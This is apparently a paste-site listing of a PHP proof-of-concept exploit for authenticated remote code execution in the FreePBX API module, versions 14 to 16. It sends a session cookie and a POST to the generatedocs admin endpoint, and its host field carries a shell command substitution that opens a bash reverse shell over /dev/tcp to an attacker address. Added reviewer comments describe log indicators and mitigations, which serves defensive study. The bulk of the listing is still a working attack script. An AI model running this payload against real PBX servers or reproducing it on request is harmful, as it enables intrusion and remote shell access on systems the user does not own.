FlyFar

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Jun 8th, 2024
PHP 1.27 KB | Cybersecurity | 0 0
  <?php
  ///
  /// FREEPBX [14,15,16] API Module Authenticated RCE
  /// Original Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI
  /// Cod[3]d by Cold z3ro
  ///
  // Reviewer notes (defensive reading of this proof of concept):
  //  - The script sends one authenticated POST to the admin AJAX endpoint
  //    /admin/ajax.php?module=api&command=generatedocs.
  //  - The form field `host` carries a URL whose path contains a `$( ... )`
  //    shell command substitution. The server-side handler is not shown on
  //    this page; the PoC presumes that handler passes `host` to a shell
  //    without validation or escaping (confirm against the module source).
  //  - No CVE id, fixed version or vendor advisory is given on this page.
  //  - Detection: look in web access/application logs for POSTs to
  //    ajax.php with module=api and command=generatedocs whose body has a
  //    `host` value containing `$(`, backticks or `/dev/tcp/`, and for
  //    unexpected outbound connections started by the web server user.
  //  - Mitigation: keep the API module patched, limit the admin interface
  //    to management networks, and on the server side accept only a strict
  //    hostname/URL for `host` and avoid building shell command strings.
  $url = "10.10.10.186"; // remote host
  $backconnectip = "192.168.0.2"; // address embedded twice in the `host` field below
  $port = "4444"; // assigned here but not read anywhere else in this listing
  // Sent as the only credential (session cookie). The author's claim is that
  // any authenticated session is accepted, including an extension-level one;
  // if so, the endpoint lacks an authorization check beyond "logged in".
  $PHPSESSID = "any valid session even extension";
   
      echo "checking $url\n";
      $url = trim($url); // strip surrounding whitespace from the host string
      $ch = curl_init();
      // Plain http:// is used, so the TLS options set further down have no effect here.
      curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
      curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
      // Certificate and host-name verification are switched off (and again on
      // the two lines before curl_exec; the later calls simply repeat these).
      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
      // Two-second connect and total timeouts.
      curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
      curl_setopt($ch, CURLOPT_TIMEOUT, 2);
      // The Referer imitates the API module's admin page; a Referer header is
      // client-controlled and is not a trustworthy origin check on its own.
      curl_setopt($ch, CURLOPT_HTTPHEADER, [
          'Referer: http://'.$url.'/admin/config.php?display=api',
          'Content-Type: application/x-www-form-urlencoded',
      ]);
      curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);
      // Form body: scopes=rest plus the `host` field. `%26` is a URL-encoded `&`,
      // so the form parser does not split the field at that character. The
      // `$( ... )` segment is the injected part; a value like this in `host`
      // is the indicator to alert on.
      curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');
      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
   
      // `.` binds tighter than `=`, so $response holds the body plus "\n".
      // When curl_exec() returns false (e.g. on timeout) only the newline is printed.
      echo $response = curl_exec($ch)."\n";
   
      curl_close($ch);
   
  ?>